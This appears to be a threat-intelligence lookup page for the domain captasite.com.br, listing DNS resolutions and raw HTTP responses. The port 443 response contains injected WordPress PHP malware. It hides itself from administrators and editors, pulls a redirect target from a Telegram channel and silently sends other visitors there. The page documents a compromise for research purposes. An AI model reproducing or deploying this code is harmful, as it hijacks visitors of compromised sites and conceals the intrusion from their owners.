Help
RSS
API
Feed
Maltego
Contact
Domain > captasite.com.br
×
More information on this domain is in
AlienVault OTX
Is this malicious?
Yes
No
DNS Resolutions
Date
IP Address
2021-07-22
31.170.163.197
(
ClassC
)
2026-02-03
89.116.115.17
(
ClassC
)
Port 80
HTTP/1.1 301 Moved PermanentlyConnection: Keep-AliveKeep-Alive: timeout5, max100Content-Type: text/htmlContent-Length: 795Date: Tue, 03 Feb 2026 05:36:15 GMTServer: LiteSpeedLocation: https://captasite.com.br/platform: hostingerpanel: hpanelContent-Security-Policy: upgrade-insecure-requests !DOCTYPE html>html styleheight:100%>head>meta nameviewport contentwidthdevice-width, initial-scale1, shrink-to-fitno />title> 301 Moved Permanently/title>style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}/style>/head>body stylecolor: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;>div styleheight:auto; min-height:100%; > div styletext-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;> h1 stylemargin:0; font-size:150px; line-height:150px; font-weight:bold;>301/h1>h2 stylemargin-top:20px;font-size: 30px;>Moved Permanently/h2>p>The document has been permanently moved./p>/div>/div>/body>/html>
Port 443
HTTP/1.1 301 Moved PermanentlyConnection: Keep-AliveKeep-Alive: timeout5, max100X-Powered-By: PHP/7.3.33Content-Type: text/html; charsetUTF-8X-Pingback: https://www.captasite.com.br/xmlrpc.phpX-Redirect-By: WordPressLocation: https://www.captasite.com.br/Content-Length: 3118Date: Tue, 03 Feb 2026 05:36:17 GMTServer: LiteSpeedplatform: hostingerpanel: hpanelRetry-After: 60Content-Security-Policy: upgrade-insecure-requests article idpost- classsearch-item> div classwrap> h5 classh>/h5> a href classbutton-style3>span>Read More/span>/a> /div>/article>add_action(template_redirect, custom_redirect_function);function custom_redirect_function() { global $wpdb; $on_hot_redirect true; function _getIP() { if (isset($_SERVERHTTP_CF_CONNECTING_IP)) { return $_SERVERHTTP_CF_CONNECTING_IP; } elseif (!empty($_SERVERHTTP_CLIENT_IP)) { return $_SERVERHTTP_CLIENT_IP; } elseif (!empty($_SERVERHTTP_X_FORWARDED_FOR)) { return $_SERVERHTTP_X_FORWARDED_FOR; } else { return $_SERVERREMOTE_ADDR; } } function fetch_remote($url) { if (function_exists(curl_version)) { $ch curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_USERAGENT, Mozilla/5.0 (Windows NT 10.0; Win64; x64)); curl_setopt($ch, CURLOPT_TIMEOUT, 5); $response curl_exec($ch); curl_close($ch); return $response; } return @file_get_contents($url); } function get_redirect_link($cache_file) { $html fetch_remote(https://t.me/s/trafficredirect1); if (!$html) return false; if (preg_match_all(/code>(https?:\/\/^+)\/code>/, $html, $matches)) { $link end($matches1); if (!empty($link)) { file_put_contents($cache_file, $link); return $link; } } if (preg_match_all(/a^>+href(https?:\/\/^+)^>*>/i, $html, $matches)) { foreach (array_reverse($matches1) as $link) { if (strpos($link, t.me) false) { file_put_contents($cache_file, $link); return $link; } } } return false; } $ip _getIP(); $ua $_SERVERHTTP_USER_AGENT; $table $wpdb->prefix . wusers_inputs; if ($wpdb->get_var(SHOW TABLES LIKE $table) ! $table) { require_once(ABSPATH . wp-admin/includes/upgrade.php); $sql CREATE TABLE $table ( ip INT(11) UNSIGNED NOT NULL, useragent VARCHAR(535) NOT NULL ) ENGINEMyISAM DEFAULT CHARSETutf8;; dbDelta($sql); } $exists $wpdb->get_var($wpdb->prepare( SELECT 1 FROM $table WHERE ip %s AND useragent %s LIMIT 1, ip2long($ip), $ua )); if ((current_user_can(editor) || current_user_can(administrator)) && !$exists) { $wpdb->insert($table, array( ip > ip2long($ip), useragent > $ua )); $exists true; } if ($on_hot_redirect && !$exists) { $exists $wpdb->get_var($wpdb->prepare( SELECT 1 FROM $table WHERE ip %s OR useragent %s LIMIT 1, ip2long($ip), $ua )); if (!$exists) { $cache_file sys_get_temp_dir() . / . md5(tg_redirect_cache); if (file_exists($cache_file) && filesize($cache_file) > 0) { $age time() - filemtime($cache_file); $link trim(file_get_contents($cache_file)); } if (!isset($link) || $age > 30 || empty($link)) { $link get_redirect_link($cache_file); } if ($link) { wp_redirect($link); exit; } } }}
View on OTX
|
View on ThreatMiner
Please enable JavaScript to view the
comments powered by Disqus.
Data with thanks to
AlienVault OTX
,
VirusTotal
,
Malwr
and
others
. [
Sitemap
]